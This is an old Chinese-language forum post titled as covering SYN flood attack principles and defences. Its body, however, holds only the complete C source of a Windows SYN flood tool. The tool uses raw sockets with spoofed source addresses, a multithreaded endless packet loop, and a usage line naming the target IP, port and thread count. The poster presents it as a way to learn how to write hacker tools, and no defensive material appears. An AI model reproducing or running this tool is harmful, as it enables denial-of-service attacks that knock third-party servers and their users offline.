返回列表 发帖
千與千尋 该用户已被删除
楼主 跳转到 »
千與千尋发表于 2005-6-5 15:58 | 显示全部帖子

SYN flood网络攻击的原理及其防御方法

  1. &#35;include <winsock2.h>
  2. &#35;include <Ws2tcpip.h>
  3. &#35;include <stdio.h>
  4. &#35;pragma comment(lib,"ws2_32.lib")
  5. &#35;define SEQ 0x28376839
  6. int threadnum,maxthread,port;
  7. char *DestIP;//目标IP
  8. void display(void) // 定义状态提示函数
  9. {
  10. static int play=0;
  11. // 进度条
  12. char *plays[12]=
  13. {
  14. " | ",
  15. " / ",
  16. " - ",
  17. " \\ ",
  18. " | ",
  19. " / ",
  20. " - ",
  21. " \\ ",
  22. " | ",
  23. " / ",
  24. " - ",
  25. " \\ ",
  26. };
  27. printf("=%s= %d threads \r", plays[play],threadnum);
  28. play=(play==11)?0:play+1;
  29. }
  30. //定义一个tcphdr结构来存放TCP首部
  31. typedef struct tcphdr
  32. {
  33. USHORT th_sport;//16位源端口号
  34. USHORT th_dport;//16位目的端口号
  35. unsigned int th_seq;//32位序列号
  36. unsigned int th_ack;//32位确认号
  37. unsigned char th_lenres;//4位首部长度+6位保留字中的4位
  38. unsigned char th_flag;////6位标志位
  39. USHORT th_win;//16位窗口大小
  40. USHORT th_sum;//16位效验和
  41. USHORT th_urp;//16位紧急数据偏移量
  42. }TCP_HEADER;
  43. //定义一个iphdr来存放IP首部
  44. typedef struct iphdr//ip首部
  45. {
  46. unsigned char h_verlen;//4位手部长度,和4位IP版本号
  47. unsigned char tos;//8位类型服务
  48. unsigned short total_len;//16位总长度
  49. unsigned short ident;//16位标志
  50. unsigned short frag_and_flags;//3位标志位(如SYN,ACK,等等)
  51. unsigned char ttl;//8位生存时间
  52. unsigned char proto;//8位协议
  53. unsigned short checksum;//ip手部效验和
  54. unsigned int sourceIP;//伪造IP地址
  55. unsigned int destIP;//攻击的ip地址
  56. }IP_HEADER;
  57. //TCP伪首部,用于进行TCP效验和的计算,保证TCP效验的有效性
  58. struct
  59. {
  60. unsigned long saddr;//源地址
  61. unsigned long daddr;//目的地址
  62. char mbz;//置空
  63. char ptcl;//协议类型
  64. unsigned short tcpl;//TCP长度
  65. }PSD_HEADER;
  66. //计算效验和函数,先把IP首部的效验和字段设为0(IP_HEADER.checksum=0)
  67. //然后计算整个IP首部的二进制反码的和。
  68. USHORT checksum(USHORT *buffer, int size)
  69. {
  70. unsigned long cksum=0;
  71. while(size >1) {
  72. cksum+=*buffer++;
  73. size-=sizeof(USHORT);
  74. }
  75. if(size) cksum+=*(UCHAR*)buffer;
  76. cksum=(cksum >> 16)+(cksum&0xffff);
  77. cksum+=(cksum >>16);
  78. return (USHORT)(~cksum);
  79. }
  80. DWORD WINAPI SynfloodThread(LPVOID lp)//synflood线程函数
  81. {
  82. SOCKET sock =NULL;
  83. int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
  84. struct sockaddr_in sockAddr;
  85. TCP_HEADER tcpheader;
  86. IP_HEADER ipheader;
  87. char sendBuf[128];
  88. sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
  89. if(sock==INVALID_SOCKET)
  90. {
  91. printf("Socket failed: %d\n",WSAGetLastError());
  92. return 0;
  93. }
  94. //设置IP_HDRINCL以便自己填充IP首部
  95. ErrorCode=setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
  96. if(ErrorCode==SOCKET_ERROR)
  97. {
  98. printf("Set sockopt failed: %d\n",WSAGetLastError());
  99. return 0;
  100. }
  101. //设置发送超时
  102. ErrorCode=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
  103. if(ErrorCode==SOCKET_ERROR)
  104. {
  105. printf("Set sockopt time out failed: %d\n",WSAGetLastError());
  106. return 0;
  107. }
  108. //设置目标地址
  109. memset(&sockAddr,0,sizeof(sockAddr));
  110. sockAddr.sin_family=AF_INET;
  111. sockAddr.sin_addr.s_addr =inet_addr(DestIP);
  112. FakeIpNet=inet_addr(DestIP);
  113. FakeIpHost=ntohl(FakeIpNet);
  114. //填充IP首部
  115. ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
  116. ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
  117. ipheader.ident = 1;
  118. ipheader.frag_and_flags = 0;
  119. ipheader.ttl = 128;
  120. ipheader.proto = IPPROTO_TCP;
  121. ipheader.checksum =0;
  122. ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
  123. ipheader.destIP = inet_addr(DestIP);
  124. //填充TCP首部
  125. tcpheader.th_dport=htons(port);
  126. tcpheader.th_sport = htons(8080);
  127. tcpheader.th_seq = htonl(SEQ+SendSEQ);
  128. tcpheader.th_ack = 0;
  129. tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
  130. tcpheader.th_flag = 2;
  131. tcpheader.th_win = htons(16384);
  132. tcpheader.th_urp = 0;
  133. tcpheader.th_sum = 0;
  134. PSD_HEADER.saddr=ipheader.sourceIP;
  135. PSD_HEADER.daddr=ipheader.destIP;
  136. PSD_HEADER.mbz=0;
  137. PSD_HEADER.ptcl=IPPROTO_TCP;
  138. PSD_HEADER.tcpl=htons(sizeof(tcpheader));
  139. for(;;)
  140. {
  142. SendSEQ=(SendSEQ==65536)?1:SendSEQ+1;
  143. ipheader.checksum =0;
  144. ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
  145. tcpheader.th_seq = htonl(SEQ+SendSEQ);
  146. tcpheader.th_sport = htons(SendSEQ);
  147. tcpheader.th_sum = 0;
  148. PSD_HEADER.saddr=ipheader.sourceIP;
  149. //把TCP伪首部和TCP首部复制到同一缓冲区并计算TCP效验和
  150. memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
  151. memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
  152. tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
  153. memcpy(sendBuf,&ipheader,sizeof(ipheader));
  154. memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
  155. memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
  156. dataSize=sizeof(ipheader)+sizeof(tcpheader);
  157. ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
  158. memcpy(sendBuf,&ipheader,sizeof(ipheader));
  159. sendto(sock,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
  160. display();
  163. }//end for
  164. Sleep(20);
  165. InterlockedExchangeAdd((long *)&threadnum,-1);
  166. return 0;
  167. }
  168. void usage(char *name)
  169. {
  170. printf("\t===================SYN Flood======================\n");
  171. printf("\t==========gxisone@hotmail.com 2004/7/6========\n");
  172. printf("\tusage: %s [dest_IP] [port] [thread]\n",name);
  173. printf("\tExample: %s 192.168.1.1 80 100\n",name);
  174. }
  175. int main(int argc,char* argv[])
  176. {
  178. if(argc!=4)
  179. {
  181. usage(argv[0]);
  182. return 0;
  183. }
  184. usage(argv[1]);
  185. int ErrorCode=0;
  186. DestIP=argv[1];//取得目标主机IP
  187. port=atoi(argv[2]);//取得目标端口号
  188. maxthread=(maxthread>100)?100:atoi(argv[3]);
  189. //如果线程数大于100则把线程数设置为100
  190. WSADATA wsaData;
  191. if((ErrorCode=WSAStartup(MAKEWORD(2,2),&wsaData))!=0){
  192. printf("WSAStartup failed: %d\n",ErrorCode);
  193. return 0;
  194. }
  196. printf("[start]...........\nPress any key to stop!\n");
  197. while(threadnum<maxthread)//循环创建线程
  198. {
  199. if(CreateThread(NULL,0,SynfloodThread,0,0,0))
  200. {
  201. Sleep(10);
  202. threadnum++;
  203. }
  204. }
  205. WSACleanup();
  206. printf("\n[Stopd]...........\n");
  208. return 0;
  209. }
复制代码
一个SYN flood 工具源代码~~可以学习一下如何编写黑客工具

TOP

返回列表 回复 发帖